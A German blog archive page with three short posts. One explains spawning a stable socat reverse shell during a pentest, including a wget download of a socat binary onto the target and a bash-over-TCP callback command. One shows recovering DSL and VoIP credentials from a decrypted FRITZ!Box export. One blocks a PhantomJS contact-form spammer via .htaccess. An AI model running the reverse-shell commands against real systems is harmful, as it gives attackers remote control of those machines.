Dies ist das Archiv zu der Kategorie 'Code'.

Mit socat eine Remote-Shell spawnen

Abgelegt unter Code, Sicherheit am 22.01.2018

Weil ich dummerweise gerade wieder Strg+C gedrückt habe und mir logischerweise die netcat Remote-Shell dadurch abgenippelt ist…

Entweder ist socat schon auf dem Pentest-Opfer installiert (was zu 0,00001% der Fall ist), oder einfach per wget das entsprechende Binary holen.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

Wobei das /tmp-Verzeichnis nicht zwingend beschreibbar sein muß…
Ein chmod +x /tmp/socat dann aber auch nicht vergessen!
(sind noch ein paar ganz andere hilfreiche Binaries zu finden: https://github.com/andrew-d/static-binaries )

Auf dem eigenen Rechner (pentestrechner) dann

socat file:`tty`,raw,echo=0 tcp-listen:12345

Port 12345 ist durch einen beliebigen Port zu ersetzen, Hauptsache er ist von außen zu erreichen… ggf. Firewall/Router das Portforwading einrichten

Und mittels:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:pentestrechner:12345
klappt es dann auch mit der Remote-Shell, die einem nicht einfach mit Ctrl+C wegstirbt 😛


DSL- und sonstige Zugangsdaten (wie z.B. VoIP-Kennwort) aus der FRITZ!Box auslesen

Abgelegt unter Code, Fundstück der Woche, Sicherheit am 23.11.2017

Nachdem es ja keinen Routerzwang mehr gibt, darf ja jeder selbst ein Endgerät dranstöpseln.

Dumm nur, wenn man dann die DSL-Zugangsdaten oder den Login für den Sipgate-Account in der alten Fritzbox gespeichert hat, beim Import in die neue Box aber diese nicht zum Import angeboten werden… 🙁

Aber es gibt findige Bastler wie den Michael Engelke, die es einem sehr leicht machen…

Einfach dessen Tools runterladen, und wenn man schon PHP [CLI] auf dem System hat, kann man sich sogar das Installieren sparen.

Für Linux-Freunde sollte das selbsterklärend ablaufen, für die Windows-Fraktion gibt es wahlweise ebenfalls wieder ein Archiv zum Runterladen.
(und wenn man schon eine php.exe irgendwo im System hat, einfach die Tools in das gleiche Verzeichnis entpacken)

Einmal die Daten aus der Fritzbox exportieren, Kennwort für den Export bitte nicht vergessen!
Export-Datei auf einen etwas passableren Namen kürzen (wie z.B. config.export).

An manchen Fritzboxen benötigt man keinen Benutzernamen, da reicht dann auch nur das Kennwort. Läßt sich aber an der gleichen Stelle wie folgende Änderung umstellen.
Unter FRITZ!Box-Benutzer » Anmeldung im Heimnetz das „Ausführung bestimmter Einstellungen und Funktionen zusätzlich bestätigen“ deaktivieren.

Dann kann man auf der Kommandozeile ins entsprechende Verzeichnis wechseln, und mit:
fb_tools.bat {KennwortderFritzbox|oder|Benutzername:KennwortderFritzbox}@{IP-AdressederFritzbox} Konfig File-Decrypt {NamederExportdatei} {Exportkennwort}

Bei folgenden Demodaten würde das dann so aussehen:
IP-Adresse der Fritzbox: 192.168.178.1
Benutzername der Fritzbox: maxmustermann
Kennwort der Fritzbox: passwort
Exportdatei: config.export
Kennwort beim Export: 123456

fb_tools.bat maxmustermann:passwort@192.168.178.1 Konfig File-Decrypt config.export 123456


Kontaktformular-Spam von Amelie Betz

Abgelegt unter Aufklärung, Code, EDV, IT am 27.08.2017

Hui, da geht’s am Wochenende aber wieder rund!

Von verschiedenen Kontaktformularen prasseln gerade folgende Nachricht rein:

You have received a new contact form message.
Name : Amelie Betz
Email : elena.uhsler@mail.com
Message : Rufen Sie uns an unter +49 1805015480

Na, dann gucken wir doch mal ins Logfile…

Och, hat sich wirklich jemand die Mühe gemacht, und mit PhantomJS gescripted Captchas extrahiert und dann Spam abgekippt.

.htaccess-Datei anlegen:

BrowserMatchNoCase "PhantomJS" bots

Order Allow,Deny
Allow from ALL
Deny from env=bots

Kann natürlich beliebig um andere Bots erweitert werden, und schon is Ruh mit dem Spammer, der zu dumm dazu war, den UserAgent zu ändern 😛



blog powered by wordpress
Design by Office and IT - Business Solutions
Optimiert durch suchmaschinen-freundlich